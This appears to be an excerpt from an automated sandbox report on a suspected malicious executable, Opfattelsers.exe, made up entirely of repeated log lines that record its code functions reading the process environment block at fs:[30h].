Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7A3FC2 mov eax, dword ptr fs:[00000030h]	6_2_1F7A3FC2
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F847F3E mov eax, dword ptr fs:[00000030h]	6_2_1F847F3E
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F81FF42 mov eax, dword ptr fs:[00000030h]	6_2_1F81FF42
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7E1FB8 mov eax, dword ptr fs:[00000030h]	6_2_1F7E1FB8
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7DBFB0 mov eax, dword ptr fs:[00000030h]	6_2_1F7DBFB0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7B1F92 mov ecx, dword ptr fs:[00000030h]	6_2_1F7B1F92
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7B1F92 mov ecx, dword ptr fs:[00000030h]	6_2_1F7B1F92
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7B1F92 mov eax, dword ptr fs:[00000030h]	6_2_1F7B1F92
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7B1F92 mov ecx, dword ptr fs:[00000030h]	6_2_1F7B1F92
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7B1F92 mov ecx, dword ptr fs:[00000030h]	6_2_1F7B1F92
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7B1F92 mov eax, dword ptr fs:[00000030h]	6_2_1F7B1F92
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7B1F92 mov ecx, dword ptr fs:[00000030h]	6_2_1F7B1F92
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7B1F92 mov ecx, dword ptr fs:[00000030h]	6_2_1F7B1F92
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7B1F92 mov eax, dword ptr fs:[00000030h]	6_2_1F7B1F92
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7B1F92 mov ecx, dword ptr fs:[00000030h]	6_2_1F7B1F92
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7B1F92 mov ecx, dword ptr fs:[00000030h]	6_2_1F7B1F92
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7B1F92 mov eax, dword ptr fs:[00000030h]	6_2_1F7B1F92
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F79FF90 mov edi, dword ptr fs:[00000030h]	6_2_1F79FF90
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F79BE78 mov ecx, dword ptr fs:[00000030h]	6_2_1F79BE78
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F82DE9B mov eax, dword ptr fs:[00000030h]	6_2_1F82DE9B
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F82DEAA mov eax, dword ptr fs:[00000030h]	6_2_1F82DEAA
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7DBE51 mov eax, dword ptr fs:[00000030h]	6_2_1F7DBE51
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7DBE51 mov eax, dword ptr fs:[00000030h]	6_2_1F7DBE51
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F84DEB0 mov eax, dword ptr fs:[00000030h]	6_2_1F84DEB0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F84DEB0 mov ecx, dword ptr fs:[00000030h]	6_2_1F84DEB0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F84DEB0 mov eax, dword ptr fs:[00000030h]	6_2_1F84DEB0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F84DEB0 mov eax, dword ptr fs:[00000030h]	6_2_1F84DEB0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F84DEB0 mov eax, dword ptr fs:[00000030h]	6_2_1F84DEB0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F85DEB0 mov eax, dword ptr fs:[00000030h]	6_2_1F85DEB0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7B5E40 mov eax, dword ptr fs:[00000030h]	6_2_1F7B5E40
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F82FEC5 mov eax, dword ptr fs:[00000030h]	6_2_1F82FEC5
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7A1E30 mov eax, dword ptr fs:[00000030h]	6_2_1F7A1E30
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7A1E30 mov eax, dword ptr fs:[00000030h]	6_2_1F7A1E30
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7BDE2D mov eax, dword ptr fs:[00000030h]	6_2_1F7BDE2D
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7BDE2D mov eax, dword ptr fs:[00000030h]	6_2_1F7BDE2D
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7BDE2D mov eax, dword ptr fs:[00000030h]	6_2_1F7BDE2D
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F859EDF mov eax, dword ptr fs:[00000030h]	6_2_1F859EDF
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F859EDF mov eax, dword ptr fs:[00000030h]	6_2_1F859EDF
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F86BEE6 mov eax, dword ptr fs:[00000030h]	6_2_1F86BEE6
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F86BEE6 mov eax, dword ptr fs:[00000030h]	6_2_1F86BEE6
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F86BEE6 mov eax, dword ptr fs:[00000030h]	6_2_1F86BEE6
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F86BEE6 mov eax, dword ptr fs:[00000030h]	6_2_1F86BEE6
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F79DE10 mov eax, dword ptr fs:[00000030h]	6_2_1F79DE10
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7DBE17 mov eax, dword ptr fs:[00000030h]	6_2_1F7DBE17
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7A3EF4 mov eax, dword ptr fs:[00000030h]	6_2_1F7A3EF4
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7A3EF4 mov eax, dword ptr fs:[00000030h]	6_2_1F7A3EF4
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7A3EF4 mov eax, dword ptr fs:[00000030h]	6_2_1F7A3EF4
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7D3EEB mov ecx, dword ptr fs:[00000030h]	6_2_1F7D3EEB
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7D3EEB mov eax, dword ptr fs:[00000030h]	6_2_1F7D3EEB
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7D3EEB mov eax, dword ptr fs:[00000030h]	6_2_1F7D3EEB
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F873E10 mov eax, dword ptr fs:[00000030h]	6_2_1F873E10
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F873E10 mov eax, dword ptr fs:[00000030h]	6_2_1F873E10
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7A3EE1 mov eax, dword ptr fs:[00000030h]	6_2_1F7A3EE1
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F875E37 mov eax, dword ptr fs:[00000030h]	6_2_1F875E37
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F875E37 mov eax, dword ptr fs:[00000030h]	6_2_1F875E37
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F875E37 mov eax, dword ptr fs:[00000030h]	6_2_1F875E37
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F79BEC0 mov eax, dword ptr fs:[00000030h]	6_2_1F79BEC0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F79BEC0 mov eax, dword ptr fs:[00000030h]	6_2_1F79BEC0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7ABEC0 mov eax, dword ptr fs:[00000030h]	6_2_1F7ABEC0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7ABEC0 mov eax, dword ptr fs:[00000030h]	6_2_1F7ABEC0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7ABEC0 mov eax, dword ptr fs:[00000030h]	6_2_1F7ABEC0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7ABEC0 mov eax, dword ptr fs:[00000030h]	6_2_1F7ABEC0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7ABEC0 mov eax, dword ptr fs:[00000030h]	6_2_1F7ABEC0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7ABEC0 mov eax, dword ptr fs:[00000030h]	6_2_1F7ABEC0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7ABEC0 mov eax, dword ptr fs:[00000030h]	6_2_1F7ABEC0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7ABEC0 mov eax, dword ptr fs:[00000030h]	6_2_1F7ABEC0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F85DE46 mov eax, dword ptr fs:[00000030h]	6_2_1F85DE46
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F849E56 mov ecx, dword ptr fs:[00000030h]	6_2_1F849E56
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F79FEA0 mov eax, dword ptr fs:[00000030h]	6_2_1F79FEA0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F79DEA5 mov eax, dword ptr fs:[00000030h]	6_2_1F79DEA5
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F79DEA5 mov ecx, dword ptr fs:[00000030h]	6_2_1F79DEA5
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7A7E96 mov eax, dword ptr fs:[00000030h]	6_2_1F7A7E96
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7D3E8F mov eax, dword ptr fs:[00000030h]	6_2_1F7D3E8F
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7A7D75 mov eax, dword ptr fs:[00000030h]	6_2_1F7A7D75
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7A7D75 mov eax, dword ptr fs:[00000030h]	6_2_1F7A7D75
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F835DA0 mov eax, dword ptr fs:[00000030h]	6_2_1F835DA0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F835DA0 mov eax, dword ptr fs:[00000030h]	6_2_1F835DA0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F835DA0 mov eax, dword ptr fs:[00000030h]	6_2_1F835DA0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F835DA0 mov ecx, dword ptr fs:[00000030h]	6_2_1F835DA0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7DBD4E mov eax, dword ptr fs:[00000030h]	6_2_1F7DBD4E
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7DBD4E mov eax, dword ptr fs:[00000030h]	6_2_1F7DBD4E
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F82DDB1 mov eax, dword ptr fs:[00000030h]	6_2_1F82DDB1
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F797D41 mov eax, dword ptr fs:[00000030h]	6_2_1F797D41
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7B3D40 mov eax, dword ptr fs:[00000030h]	6_2_1F7B3D40
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7B3D40 mov eax, dword ptr fs:[00000030h]	6_2_1F7B3D40
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7B3D40 mov eax, dword ptr fs:[00000030h]	6_2_1F7B3D40
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7B3D40 mov eax, dword ptr fs:[00000030h]	6_2_1F7B3D40
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7B3D40 mov ecx, dword ptr fs:[00000030h]	6_2_1F7B3D40
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7B3D40 mov ecx, dword ptr fs:[00000030h]	6_2_1F7B3D40
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7B3D40 mov eax, dword ptr fs:[00000030h]	6_2_1F7B3D40
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7B3D40 mov ecx, dword ptr fs:[00000030h]	6_2_1F7B3D40
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7B3D40 mov ecx, dword ptr fs:[00000030h]	6_2_1F7B3D40
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7B3D40 mov eax, dword ptr fs:[00000030h]	6_2_1F7B3D40
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7B3D40 mov ecx, dword ptr fs:[00000030h]	6_2_1F7B3D40
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7B3D40 mov ecx, dword ptr fs:[00000030h]	6_2_1F7B3D40
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7B3D40 mov eax, dword ptr fs:[00000030h]	6_2_1F7B3D40
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7B3D40 mov eax, dword ptr fs:[00000030h]	6_2_1F7B3D40
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7B3D40 mov eax, dword ptr fs:[00000030h]	6_2_1F7B3D40
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7B3D40 mov eax, dword ptr fs:[00000030h]	6_2_1F7B3D40
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7B3D40 mov eax, dword ptr fs:[00000030h]	6_2_1F7B3D40
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7B3D40 mov eax, dword ptr fs:[00000030h]	6_2_1F7B3D40
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7B3D40 mov eax, dword ptr fs:[00000030h]	6_2_1F7B3D40
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7B3D40 mov eax, dword ptr fs:[00000030h]	6_2_1F7B3D40
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F86DDC6 mov eax, dword ptr fs:[00000030h]	6_2_1F86DDC6
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F85DDC7 mov eax, dword ptr fs:[00000030h]	6_2_1F85DDC7
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F82DDC0 mov eax, dword ptr fs:[00000030h]	6_2_1F82DDC0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7B3D20 mov eax, dword ptr fs:[00000030h]	6_2_1F7B3D20
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7B3D00 mov eax, dword ptr fs:[00000030h]	6_2_1F7B3D00
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F82FD2A mov eax, dword ptr fs:[00000030h]	6_2_1F82FD2A
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F82FD2A mov eax, dword ptr fs:[00000030h]	6_2_1F82FD2A
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7A3DD0 mov eax, dword ptr fs:[00000030h]	6_2_1F7A3DD0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7A3DD0 mov eax, dword ptr fs:[00000030h]	6_2_1F7A3DD0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F82DD47 mov eax, dword ptr fs:[00000030h]	6_2_1F82DD47
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7BDDB1 mov eax, dword ptr fs:[00000030h]	6_2_1F7BDDB1
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7BDDB1 mov eax, dword ptr fs:[00000030h]	6_2_1F7BDDB1
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7BDDB1 mov eax, dword ptr fs:[00000030h]	6_2_1F7BDDB1
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7D9DAF mov eax, dword ptr fs:[00000030h]	6_2_1F7D9DAF
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7AFDA9 mov eax, dword ptr fs:[00000030h]	6_2_1F7AFDA9
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F875D50 mov eax, dword ptr fs:[00000030h]	6_2_1F875D50
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F875D50 mov eax, dword ptr fs:[00000030h]	6_2_1F875D50
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F861D5A mov eax, dword ptr fs:[00000030h]	6_2_1F861D5A
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F861D5A mov eax, dword ptr fs:[00000030h]	6_2_1F861D5A
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F861D5A mov eax, dword ptr fs:[00000030h]	6_2_1F861D5A
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F861D5A mov eax, dword ptr fs:[00000030h]	6_2_1F861D5A
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F799D96 mov eax, dword ptr fs:[00000030h]	6_2_1F799D96
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F799D96 mov eax, dword ptr fs:[00000030h]	6_2_1F799D96
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F799D96 mov ecx, dword ptr fs:[00000030h]	6_2_1F799D96
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F859D70 mov eax, dword ptr fs:[00000030h]	6_2_1F859D70
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F859D70 mov eax, dword ptr fs:[00000030h]	6_2_1F859D70
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F79FD80 mov eax, dword ptr fs:[00000030h]	6_2_1F79FD80
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F84FD78 mov eax, dword ptr fs:[00000030h]	6_2_1F84FD78
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F84FD78 mov eax, dword ptr fs:[00000030h]	6_2_1F84FD78
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F84FD78 mov eax, dword ptr fs:[00000030h]	6_2_1F84FD78
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F84FD78 mov eax, dword ptr fs:[00000030h]	6_2_1F84FD78
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F84FD78 mov eax, dword ptr fs:[00000030h]	6_2_1F84FD78
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7D1C7C mov eax, dword ptr fs:[00000030h]	6_2_1F7D1C7C
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7B1C60 mov eax, dword ptr fs:[00000030h]	6_2_1F7B1C60
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F85FCAB mov eax, dword ptr fs:[00000030h]	6_2_1F85FCAB
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F85FCAB mov eax, dword ptr fs:[00000030h]	6_2_1F85FCAB
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F85FCAB mov eax, dword ptr fs:[00000030h]	6_2_1F85FCAB
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F85FCAB mov eax, dword ptr fs:[00000030h]	6_2_1F85FCAB
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F85FCAB mov eax, dword ptr fs:[00000030h]	6_2_1F85FCAB
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F85FCAB mov eax, dword ptr fs:[00000030h]	6_2_1F85FCAB
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F85FCAB mov eax, dword ptr fs:[00000030h]	6_2_1F85FCAB
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F85FCAB mov eax, dword ptr fs:[00000030h]	6_2_1F85FCAB
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F85FCAB mov eax, dword ptr fs:[00000030h]	6_2_1F85FCAB
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F85FCAB mov eax, dword ptr fs:[00000030h]	6_2_1F85FCAB
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F85FCAB mov eax, dword ptr fs:[00000030h]	6_2_1F85FCAB
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F85FCAB mov eax, dword ptr fs:[00000030h]	6_2_1F85FCAB
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F85FCAB mov eax, dword ptr fs:[00000030h]	6_2_1F85FCAB
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F85FCAB mov eax, dword ptr fs:[00000030h]	6_2_1F85FCAB
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F797C40 mov eax, dword ptr fs:[00000030h]	6_2_1F797C40
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F797C40 mov ecx, dword ptr fs:[00000030h]	6_2_1F797C40
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F797C40 mov eax, dword ptr fs:[00000030h]	6_2_1F797C40
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F797C40 mov eax, dword ptr fs:[00000030h]	6_2_1F797C40
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7DBC3B mov esi, dword ptr fs:[00000030h]	6_2_1F7DBC3B
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F823CDB mov eax, dword ptr fs:[00000030h]	6_2_1F823CDB
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F823CDB mov eax, dword ptr fs:[00000030h]	6_2_1F823CDB
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F823CDB mov eax, dword ptr fs:[00000030h]	6_2_1F823CDB
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F84FCDF mov eax, dword ptr fs:[00000030h]	6_2_1F84FCDF
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F84FCDF mov eax, dword ptr fs:[00000030h]	6_2_1F84FCDF
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F84FCDF mov eax, dword ptr fs:[00000030h]	6_2_1F84FCDF
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F841CF9 mov eax, dword ptr fs:[00000030h]	6_2_1F841CF9
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F841CF9 mov eax, dword ptr fs:[00000030h]	6_2_1F841CF9
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F841CF9 mov eax, dword ptr fs:[00000030h]	6_2_1F841CF9
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F87BC01 mov eax, dword ptr fs:[00000030h]	6_2_1F87BC01
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F87BC01 mov eax, dword ptr fs:[00000030h]	6_2_1F87BC01
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F82BC10 mov eax, dword ptr fs:[00000030h]	6_2_1F82BC10
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F82BC10 mov eax, dword ptr fs:[00000030h]	6_2_1F82BC10
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F82BC10 mov ecx, dword ptr fs:[00000030h]	6_2_1F82BC10
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F86DC27 mov eax, dword ptr fs:[00000030h]	6_2_1F86DC27
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F86DC27 mov eax, dword ptr fs:[00000030h]	6_2_1F86DC27
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F86DC27 mov eax, dword ptr fs:[00000030h]	6_2_1F86DC27
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F797CD5 mov eax, dword ptr fs:[00000030h]	6_2_1F797CD5
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F797CD5 mov eax, dword ptr fs:[00000030h]	6_2_1F797CD5
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F797CD5 mov eax, dword ptr fs:[00000030h]	6_2_1F797CD5
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F797CD5 mov eax, dword ptr fs:[00000030h]	6_2_1F797CD5
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F797CD5 mov eax, dword ptr fs:[00000030h]	6_2_1F797CD5
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F829C32 mov eax, dword ptr fs:[00000030h]	6_2_1F829C32
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F871C3C mov eax, dword ptr fs:[00000030h]	6_2_1F871C3C
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7B1CC7 mov eax, dword ptr fs:[00000030h]	6_2_1F7B1CC7
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7B1CC7 mov eax, dword ptr fs:[00000030h]	6_2_1F7B1CC7
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7D5CC0 mov eax, dword ptr fs:[00000030h]	6_2_1F7D5CC0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7D5CC0 mov eax, dword ptr fs:[00000030h]	6_2_1F7D5CC0
